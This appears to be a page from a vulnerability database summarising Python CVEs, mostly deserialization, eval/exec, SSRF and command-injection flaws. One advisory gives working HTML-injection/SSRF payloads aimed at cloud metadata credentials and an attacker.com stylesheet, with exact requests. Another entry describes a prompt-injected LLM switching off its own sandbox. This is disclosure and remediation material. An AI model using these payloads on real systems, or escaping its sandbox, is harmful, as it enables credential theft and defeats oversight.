{"x": "A" * 200000} def run(): try: ujson.dump(obj, BadFile()) except RuntimeError: pass run() tracemalloc.start() gc.collect() base = tracemalloc.get_traced_memory()[0] for i in range(5): run() gc.collect() cur = tracemalloc.get_traced_memory()[0] print(i, cur - base) ``` Any application that serializes data through `ujson.dump()` to an attacker-influenced file-like object that can fail can be driven into linear memory growth. An attacker can quickly use up all the memory of say a web server that sends JSON responses using `ujson.dump()` by repeatedly making requests then closing the connection mid response. The missing dec-refs were added in 82af1d0ac01d09aa40c887b460d44b9d9f4bccd9. We recommend upgrading to [UltraJSON 5.12.1](https://github.com/ultrajson/ultrajson/releases/tag/5.12.1). Replacing `ujson.dump(obj, file)` with `file.write(ujson.dumps(obj))` is equivalent (contrary to popular misconception, there are no streaming benefits to using `ujson.dump()`) and will avoid the memory leak.

Python Information Disclosure Red Hat
NVD GitHub VulDB
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Heym before 0.0.21 contains a sandbox escape vulnerability in the custom Python tool executor that allows authenticated workflow authors to bypass sandbox restrictions by using object-graph introspection primitives. Attackers can use Python introspection techniques to recover the unrestricted __import__ function, import blocked modules such as os and subprocess, and access inherited backend environment variables containing database credentials and encryption keys to execute arbitrary host commands as the backend service user.

Authentication Bypass Python Heym
NVD GitHub
EPSS 0% CVSS 9.3
CRITICAL PATCH Act Now

Sandbox escape in OpenClaude (npm package openclaude) versions before 0.5.1 allows a prompt-injected LLM to disable host sandboxing by setting the model-controlled `dangerouslyDisableSandbox: true` flag in any Bash tool_use call, yielding full unsandboxed command execution on the host. CVSS 4.0 scores this 9.3 Critical (AV:N/AC:L/PR:N/UI:N, VC/VI/VA:H); no public exploit identified at time of analysis beyond the reporter's PoC, but the upstream fix has been merged. The flaw is especially severe because it is reachable under default settings (`allowUnsandboxedCommands` defaults to true).

Kubernetes Information Disclosure Authentication Bypass +4
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL Act Now

Arbitrary code execution in imgaug library (versions through 0.4.0) occurs when the BackgroundAugmenter class deserializes malicious pickle payloads without validation in its multiprocessing worker method. Attackers who can influence queue data-through compromised shared queues, malicious input scripts, or social engineering-can achieve remote or local code execution depending on deployment context. CVSS 9.8 critical severity reflects network-based exploitation without authentication, though EPSS probability is low (0.02%, 6th percentile), indicating limited observed exploitation activity. No CISA KEV listing or public exploit code identified at time of analysis.

Python RCE Deserialization +1
NVD GitHub
EPSS 0% CVSS 8.8
HIGH This Week

Arbitrary code execution in Snorkel machine learning library (≤v0.10.0) occurs when users load malicious model checkpoint files through the Trainer.load() method. The vulnerability stems from unsafe PyTorch deserialization that processes untrusted Pickle objects without the weights_only security parameter. Attackers can embed malicious Python code in model files distributed through repositories, shared datasets, or social engineering campaigns. Despite the 8.8 CVSS score indicating critical severity, EPSS scoring at 0.06% (19th percentile) suggests very low real-world exploitation probability, and no active exploitation or public proof-of-concept has been identified at time of analysis.

Checkpoint Python RCE +1
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH This Week

Arbitrary code execution in Snorkel library (Python) through version 0.10.0 enables remote attackers to execute code by supplying malicious pickle files to the BaseLabeler.load() method. The vulnerability stems from unsafe deserialization using pickle.load() without input validation, allowing attackers to craft serialized objects that execute arbitrary commands during deserialization. With EPSS at 6th percentile, exploitation probability remains relatively low despite the critical CVSS score, and no active exploitation (KEV) or public proof-of-concept has been identified at time of analysis.

Python RCE Deserialization
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL Act Now

Arbitrary code execution in Ludwig framework ≤0.10.4 occurs when attackers supply malicious pickle files to the predict() method, which deserializes untrusted data without validation using pandas.read_pickle(). Remote unauthenticated attackers can achieve full system compromise by exploiting the automatic file format detection mechanism that processes .pkl files through Python's unsafe pickle module. EPSS score of 0.06% (19th percentile) suggests low current exploitation likelihood despite the critical CVSS 9.8 rating, though no public exploit code or active exploitation has been identified at time of analysis.

Python RCE Deserialization +1
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL Act Now

Arbitrary code execution occurs in the llm CLI tool (versions through 0.27.1) when attackers social-engineer victims into running crafted commands containing malicious Python code in the --functions argument. The tool directly executes this code via unsafe exec() without sanitization, enabling full system compromise. CVSS 9.8 assigns network attack vector and no authentication, but real-world exploitation requires local command execution by a tricked user, creating a significant disparity between the vector and actual attack prerequisites. EPSS score of 0.02% (5th percentile) suggests minimal automated exploitation risk, and no active exploitation or public POC has been identified at time of analysis.

Python Code Injection RCE +1
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH This Week

Remote code execution in Snorkel machine learning library (≤v0.10.0) occurs when users load untrusted model files via MultitaskClassifier.load(). The vulnerability exploits insecure Python object deserialization through torch.load(), allowing attackers to embed malicious code in model weight files that executes upon loading. EPSS score of 0.06% (19th percentile) suggests low observed exploitation probability in the wild, though SSVC framework indicates total technical impact once exploited. No public exploit code or active exploitation confirmed at time of analysis, but exploitation requires only that a data scientist or ML engineer load a malicious .pkl model file.

Python RCE Deserialization +1
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL Act Now

Command injection in Adversarial Robustness Toolbox (ART) up to version 1.20.1 enables remote code execution through unsafe eval() usage in Kubeflow pipeline components. The robustness_evaluation_fgsm_pytorch.py script directly evaluates user-controlled --clip_values and --input_shape arguments without sanitization, allowing Python code injection. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) indicating network-exploitable unauthenticated access, this represents critical risk in automated ML pipeline environments where attackers can control pipeline configurations. EPSS score of 0.02% (5th percentile) suggests low observed exploitation activity, though the attack vector and ML tooling context create significant supply chain risk in CI/CD and research environments.

Python RCE N A
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL Act Now

Arbitrary code execution in optimate's neural_magic_training.py allows remote attackers to execute Python code by supplying a malicious directory path containing a crafted module.py file. The _load_model() function directly executes file contents via Python's exec() without validation. CVSS 9.8 reflects network vector with no authentication, but EPSS score of 0.02% (5th percentile) indicates very low observed exploitation probability. No active exploitation confirmed (not in CISA KEV). Vulnerability exists in commit a6d302f912b481c94370811af6b11402f51d377f from July 2024. Affects organizations using optimate for neural network model optimization.

Python Code Injection RCE
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH This Week

Remote code execution in superduper (Python library) through version 0.10.0 allows unauthenticated network attackers to execute arbitrary system commands by submitting malicious query strings with embedded Python code. The _parse_op_part() function in query.py uses unsafe eval() with inadequate context restrictions, enabling attackers to import modules (such as os) and achieve complete server compromise. EPSS score is low (0.07%, 20th percentile) and no active exploitation is confirmed (CISA KEV absent), but SSVC framework rates technical impact as total. User interaction is required (CVSS UI:R), reducing automated exploitation risk. Authentication requirements not confirmed from available data - CVSS vector shows PR:N (no privileges required) but UI:R suggests user-triggered queries.

Python Code Injection RCE
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL Act Now

Remote code execution in Adversarial Robustness Toolbox (ART) versions through 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code via unsafe eval() usage in the Kubeflow robustness evaluation component. The vulnerability accepts unsanitized user input for LossFn and Optimizer parameters in PyTorch model evaluations, enabling complete system compromise. With CVSS 9.8 but only 0.06% EPSS score (18th percentile), this represents a severe theoretical risk that has not yet manifested in widespread exploitation. No public exploit code identified at time of analysis, and the vulnerability requires specific deployment of ART's Kubeflow integration component.

Python Code Injection RCE +1
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL Act Now

Arbitrary code execution via torch-checkpoint-shrink.py script in ml-engineering project allows remote attackers to execute malicious Python code by providing crafted PyTorch checkpoint files. The vulnerability stems from insecure deserialization where torch.load() processes .pt files without the weights_only=True safeguard, enabling pickle-based arbitrary object instantiation. Despite a critical CVSS 9.8 score, EPSS probability is low (0.06%, 19th percentile) and no public exploit or active exploitation is confirmed, suggesting limited real-world targeting to date. SSVC assessment indicates total technical impact with automatable exploitation potential, making this a priority for organizations using ml-engineering scripts in production environments.

Checkpoint Python RCE +2
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL Act Now

Remote code execution in PySyft Datasite/Server versions 0.9.5 and earlier allows unauthenticated attackers to execute arbitrary Python code on the server through the function submission mechanism. The vulnerability stems from insufficient validation and sandboxing of user-submitted Python functions decorated with @sy.syft_function(), which are executed using unsafe exec() and eval() calls after approval. With an EPSS score of 0.04% and no current KEV listing, this appears to be a high-severity vulnerability without confirmed active exploitation.

Python RCE Code Injection +1
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL Act Now

Remote code execution in Cognee v0.4.0 and earlier allows unauthenticated attackers to execute arbitrary Python code via the notebook cell execution API endpoint. The vulnerability stems from unsafe use of Python's exec() function without sandboxing or validation, enabling complete system compromise with server process privileges. While not actively exploited (not in KEV), the vulnerability is automatable with total technical impact per SSVC framework, though EPSS indicates low exploitation probability at 0.06%.

Python RCE Code Injection +1
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH This Week

Insecure deserialization in Optimate's neural_magic_training.py script enables remote code execution when loading PyTorch model files. The _load_model() function uses torch.load() without the weights_only=True security parameter, allowing attackers with low privileges to execute arbitrary Python code by providing malicious .pt or .pth files via the --model command-line argument. EPSS indicates low exploitation probability at 0.06% with no active exploitation confirmed.

Python RCE Deserialization +1
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH This Week

The CosyVoice project thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading process. When loading model files (.pt) from a user-specified directory (via the --model_dir argument), the code uses torch.load() without the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the Pickle module. An attacker can exploit this by providing a maliciously crafted model directory containing .pt files with embedded pickle payloads. When a victim loads this directory using CosyVoice's web interface, the malicious payload is executed, leading to remote code execution on the victim's system.

Python RCE Deserialization +1
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL Act Now

Remote code execution in Adversarial Robustness Toolbox (ART) through version 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code by uploading malicious PyTorch model files to pipeline-accessible object storage locations. The vulnerability stems from unsafe use of torch.load() without the weights_only=True parameter in the Kubeflow component's model loading process, enabling Pickle deserialization of arbitrary objects. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) but only 0.06% EPSS exploitation probability (19th percentile), this represents a critical-severity issue with low observed real-world targeting, likely due to the specialized nature of ML robustness evaluation deployments. No active exploitation confirmed (not in CISA KEV) and no public exploit code identified at time of analysis.

Python RCE Deserialization +1
NVD GitHub
EPSS 0% CVSS 8.8
HIGH This Week

Remote code execution in Optimate's neural_magic_training.py script allows authenticated attackers to execute arbitrary code via malicious PyTorch model files. The vulnerability stems from unsafe deserialization when loading model state dictionaries without PyTorch's weights_only=True security flag, enabling pickle-based arbitrary object execution. With an EPSS score of 0.06% and no confirmed exploitation, this represents a moderate risk primarily in environments where users can upload or specify model files.

Python RCE Deserialization +1
NVD GitHub VulDB
EPSS 0% CVSS 7.8
HIGH This Week

Arbitrary code execution occurs in PyTorch Lightning 2.6.0 and earlier when loading malicious checkpoint files. The LightningModule.load_from_checkpoint() method deserializes untrusted Pickle data without security restrictions, allowing attackers to execute arbitrary Python code when victims open crafted .ckpt files. EPSS score of 0.06% (19th percentile) indicates low observed exploitation probability, and no public exploit code or CISA KEV listing exists at time of analysis. Attack requires local access and user interaction (opening a malicious checkpoint), limiting remote attack scenarios to social engineering or supply chain compromise.

Checkpoint Python RCE +1
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL Act Now

Remote code execution in Mamba language model framework (through version 2.2.6) allows unauthenticated attackers to execute arbitrary Python code by publishing malicious models on HuggingFace Hub. When victims call MambaLMHeadModel.from_pretrained() on a weaponized model repository, insecure pickle deserialization executes attacker-controlled code in the context of the victim's process. Despite the critical CVSS 9.8 score and network attack vector requiring no authentication, EPSS probability remains extremely low (0.02%, 5th percentile), suggesting limited real-world exploitation to date. No CISA KEV listing or public POC identified at time of analysis.

Python RCE Deserialization +1
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL Act Now

Remote code execution in Ludwig framework ≤0.10.4 allows unauthenticated network attackers to execute arbitrary code by supplying a malicious PyTorch model file to the ludwig serve endpoint. The vulnerability stems from unsafe deserialization in the model loading component, which uses torch.load() without the weights_only=True safety parameter. With CVSS 9.8 (critical network vector, no authentication required) but only 0.02% EPSS, this represents a high-severity issue in vulnerable deployments, though widespread exploitation has not been observed. No CISA KEV listing or public POC identified at time of analysis.

Python RCE Deserialization +1
NVD GitHub
EPSS 0% CVSS 5.0
MEDIUM PATCH This Month

{title}</title>") # ← title is not escaped if metadata: for key, value in metadata.items(): html_parts.append(f'<meta name="{key}" content="{value}">') # ← key/value are not escaped ``` **Data flow trace:** ``` User input: research.query │ ▼ research_routes.py:1321 pdf_title = research.title or research.query │ ▼ research_routes.py:1325-1326 export_report_to_memory(report_content, format, title=pdf_title) │ ▼ pdf_service.py:107 PDFService.markdown_to_pdf(markdown_content, title=pdf_title) │ ▼ pdf_service.py:137 _markdown_to_html(markdown_content, title, metadata) │ ▼ pdf_service.py:172 f"<title>{title}</title>" ← injection point, no escaping │ ▼ pdf_service.py:112 HTML(string=html_content) ← WeasyPrint renders the injected HTML ``` `research.query` is a string submitted by the user via `POST /api/start_research`, stored as-is in the database, and retrieved without any sanitization. When the user triggers `POST /api/v1/research/<research_id>/export/pdf`, this value is embedded unescaped into the HTML document processed by WeasyPrint. **Injection point 1: `<title>` tag breakout** ``` Input: </title><img src="http://169.254.169.254/latest/meta-data/" /> Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title> ``` When WeasyPrint encounters the injected `<img>` tag, it issues an HTTP GET request to the value of `src` by default. **Injection point 2: `<meta>` attribute breakout** ``` Input: " /><link rel="stylesheet" href="http://attacker.com/evil.css Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css"> ``` WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF. --- **Step 1: Log in and submit a research query containing the injection payload** ```http POST /api/start_research HTTP/1.1 Host: localhost:5000 Content-Type: application/json Cookie: session=<valid_session> { "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>", "mode": "quick", "model_provider": "OLLAMA", "model": "llama3" } ``` The response returns a `research_id`, e.g. `"aaaa-bbbb-cccc-dddd"`. **Step 2: After the research completes, trigger PDF export** ```http POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1 Host: localhost:5000 Cookie: session=<valid_session> X-CSRFToken: <csrf_token> ``` **Step 3: Intermediate HTML constructed server-side** ```html <!DOCTYPE html><html><head> <meta charset="utf-8"> <title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title> </head><body> ...report content... </body></html> ``` **Step 4: WeasyPrint issues an outbound HTTP request to the injected URL** Observed in network monitoring (e.g. `tcpdump`) or the target internal service logs: ``` GET /latest/meta-data/iam/security-credentials/ HTTP/1.1 Host: 169.254.169.254 User-Agent: WeasyPrint/... ``` **Lightweight verification (no SSRF environment required):** Set the query to: ``` </title><title>INJECTED ``` The resulting HTML will contain two `<title>` tags and the PDF document metadata title will read `INJECTED`, confirming successful injection. --- By injecting `<img src>`, `<link href>`, or `<style>@import url()` tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to: - **Cloud metadata services** (`169.254.169.254`) on AWS, GCP, or Azure - enabling theft of IAM credentials and instance identity documents. - **Internal network services** (`192.168.x.x`, `10.x.x.x`) - enabling reconnaissance and interaction with internal APIs not exposed to the internet. - **Localhost administrative interfaces** - if SSRF protections are only applied at the user-input validation layer. This is an effective bypass of the application's existing SSRF defenses in `ssrf_validator.py`, because WeasyPrint's outbound resource requests are never routed through that validator. Injected tags can prematurely close `<head>` and insert arbitrary content into `<body>`, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality. By injecting `<link>` or `<style>` tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing. - All PDF export operations are affected. - The vulnerability is reachable by any authenticated user - no elevated privileges required. - Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability. --- Apply `html.escape()` to all user-controlled values before embedding them in the HTML template inside `_markdown_to_html`: ```python import html if title: html_parts.append(f"<title>{html.escape(title)}</title>") if metadata: for key, value in metadata.items(): html_parts.append( f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">' ) ``` Additionally, consider configuring WeasyPrint with a custom `url_fetcher` that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources: ```python def safe_url_fetcher(url, timeout=10): from ssrf_validator import validate_url if not validate_url(url): raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}") return weasyprint.default_url_fetcher(url, timeout=timeout) html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher) ``` --- *Report generated against commit `f3540fb3` - local-deep-research, branch `main`.* --- Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to `main`: **#3082** (merged 2026-03-29, shipped in **v1.5.0+**) - closes the HTML-injection sinks: - `html.escape()` now wraps the `title` value in `<title>…</title>` - Same for metadata keys/values in `<meta name="…" content="…">` - Regression tests added in `tests/web/services/test_pdf_service.py` **#3613** (merged 2026-04-24, shipped in **v1.6.0**) - implements the `url_fetcher` recommendation from the Remediation section: - New `_safe_url_fetcher` in `pdf_service.py` delegates to `weasyprint.default_url_fetcher` only after `security.ssrf_validator.validate_url` accepts the URL - Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes - Covers the chained SSRF path through any URL reaching the rendered HTML - markdown body, citations, raw-HTML passthrough via Python-Markdown - Blocked URLs raise `UnsafePDFResourceURLError` (a `ValueError` subclass) so WeasyPrint skips the resource and the render continues - 8 regression tests, including an end-to-end render with `<img src="http://169.254.169.254/…">` embedded in the body **Advisory metadata:** CVSS `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N` (5.0 Moderate), CWEs **CWE-79** + **CWE-918**. **Patched in v1.6.0** - upgrade to v1.6.0 or later to receive both fixes.

Denial Of Service SSRF Microsoft +2
NVD GitHub VulDB
EPSS 0% CVSS 4.6
MEDIUM This Month

Stored cross-site scripting (XSS) via CSS injection in Open edX Platform allows enrolled students to inject arbitrary CSS into discussion notification emails sent to other users by bypassing insufficient HTML sanitization in the clean_thread_html_body() function. The vulnerability affects all versions prior to the fix commit and enables email tracking through malicious stylesheets, content spoofing, and phishing attacks against recipients who view notification emails.

XSS Python
NVD GitHub
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Server-Side Request Forgery in Budibase self-hosted instances allows authenticated Global Builder users to bypass SSRF protections via trivial substring manipulation in plugin URL uploads. The vulnerability exploits a flawed validation check that accepts any URL containing '.tar.gz' anywhere in the string, enabling requests to internal cloud metadata services (AWS IMDS at 169.254.169.254), CouchDB, Redis, and private network ranges when chained with the BLACKLIST_IPS bypass (CVE-2026-45060) or via HTTP redirect chains. CVSS 7.7 (High) with Changed Scope indicates cross-boundary impact from application to infrastructure layer. Vendor-released patch available in version 3.35.10 per GitHub security advisory GHSA-xh5j-727m-w6gg. EPSS data not available; no CISA KEV listing at time of analysis. Publicly available exploit code exists in researcher's GitHub repository with Docker-based proof-of-concept.

Redis SSRF Microsoft +3
NVD GitHub
EPSS 0% CVSS 8.2
HIGH PATCH This Week

{% include %} and {% render %} Liquid tags. The built-in FileSystemLoader and CachingFileSystemLoader failed to reject absolute paths, escaping the configured search path; no public exploit identified at time of analysis but the vendor advisory (GHSA-8p4x-wr7x-3788) publicly documents the bypass mechanism.

Python Path Traversal
NVD GitHub
EPSS 0% CVSS 8.2
HIGH This Week

Server-side request forgery (SSRF) in GuardDog 1.0.0 through 2.9.0 allows remote attackers to exfiltrate GitHub personal access tokens and probe internal networks via malicious repository URLs. The vulnerability stems from blind string replacement in ProjectScanner.scan_remote() that fails to validate hostnames before appending authentication credentials. No vendor-released patch identified at time of analysis. Publicly available exploit code exists via GitHub advisory reproduction steps. CVSS 8.2 (High) with network vector and no authentication required.

Python SSRF
NVD GitHub VulDB
EPSS 0% CVSS 5.0
MEDIUM This Month

GuardDog versions 2.6.0 through 2.9.0 fail to escape terminal control characters in human-readable scan output, allowing malicious packages to inject ANSI or OSC escape sequences that can clear analyst terminals, rewrite CI logs, or inject spoofed content. The vulnerability affects file paths, code snippets, and messages parsed from package content and rendered directly to stdout without sanitization. Remote attackers can exploit this by distributing packages with specially crafted filenames or source code containing escape sequences, and requires only user interaction (running the scanner on the malicious package).

Python Code Injection
NVD GitHub
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

pgAdmin 4 before version 9.15 allows unauthenticated attackers to bypass account lockout and perform unbounded password-guessing attacks against INTERNAL authentication accounts by exploiting Flask-Security's default /login endpoint, which does not enforce the locked column that the custom /authenticate/login view relies on for brute-force protection. The vulnerability affects only accounts using pgAdmin's INTERNAL authentication source; LDAP, OAuth2, Kerberos, and Webserver authentication methods are not vulnerable because they do not use local passwords.

Authentication Bypass Python
NVD GitHub
EPSS 0% CVSS 7.3
HIGH PATCH This Week

Unsafe Python pickle deserialization in pgAdmin 4 FileBackedSessionManager allows authenticated local users with session-directory write access to execute arbitrary code as the pgAdmin process. The vulnerability arises from deserializing session files before validating their HMAC signature, enabling payload injection through crafted pickle objects. Attackers require both valid authentication and filesystem write permission to the sessions directory-achievable through misconfiguration or chaining with a separate path-traversal vulnerability. EPSS exploitation probability and KEV status not provided; no public exploit code identified at time of analysis. PostgreSQL maintainers confirmed the flaw and patched it in version 9.15 by implementing pre-deserialization HMAC validation.

Python RCE Deserialization
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Command injection in BentoML 1.4.38 and earlier allows attackers to execute arbitrary code on build hosts when victims containerize malicious bentos. Exploitation occurs during the `bentoml containerize` workflow when unvalidated `envs[*].name` and `docker.base_image` fields from imported bentofile.yaml are interpolated into generated Dockerfiles without escaping, enabling newline-injection of RUN directives executed by `docker build`. This is a sibling vulnerability to CVE-2026-33744 and CVE-2026-35043 which patched the same injection class in `system_packages` fields but left these additional attack surfaces unaddressed. Patch version 1.4.39 available from vendor. No CISA KEV listing or public POC outside gated HuggingFace repository at time of analysis, but end-to-end reproduction confirmed by reporter on BentoML 1.4.38.

Python Docker Command Injection
NVD GitHub
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Command injection in BentoML allows arbitrary code execution on developer workstations during containerization of untrusted bento packages. Attackers craft malicious bento.yaml files with newline-injected docker.base_image values that smuggle Dockerfile RUN directives into the generated Dockerfile template. When victims run 'bentoml containerize' on the malicious bento, Docker build executes the injected commands on the host system with full developer privileges. This vulnerability (GHSA-78f9-r8mh-4xm2) is part of a documented cluster alongside GHSA-w2pm-x38x-jp44, CVE-2026-33744, and CVE-2026-35043, all involving unsafe Jinja2 template interpolation in BentoML's Dockerfile generation pipeline. Fixed in version 1.4.39. No active exploitation confirmed at time of analysis; EPSS data not available for 2026-dated CVE.

Python Docker Command Injection
NVD GitHub
EPSS 0% CVSS 8.7
HIGH This Week

Cross-Site WebSocket Hijacking (CSWSH) in Dozzle's /exec and /attach endpoints allows authenticated shell access bypass when --enable-shell is enabled. The vulnerability stems from WebSocket origin validation bypass (CheckOrigin returns true) combined with SameSite=Lax JWT cookies, enabling attackers on same-site origins (sibling subdomains or localhost services) to hijack victim WebSocket sessions and execute arbitrary commands in Docker containers. Affects all Dozzle deployments through version 10.5.1 with shell access enabled. No public exploit identified at time of analysis, but detailed proof-of-concept exists in the GitHub advisory demonstrating container shell access via Python script. CVSS score not assigned, but CWE-346 classification indicates origin validation failure.

Python Docker RCE
NVD GitHub VulDB
Prev Page 5 of 24 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy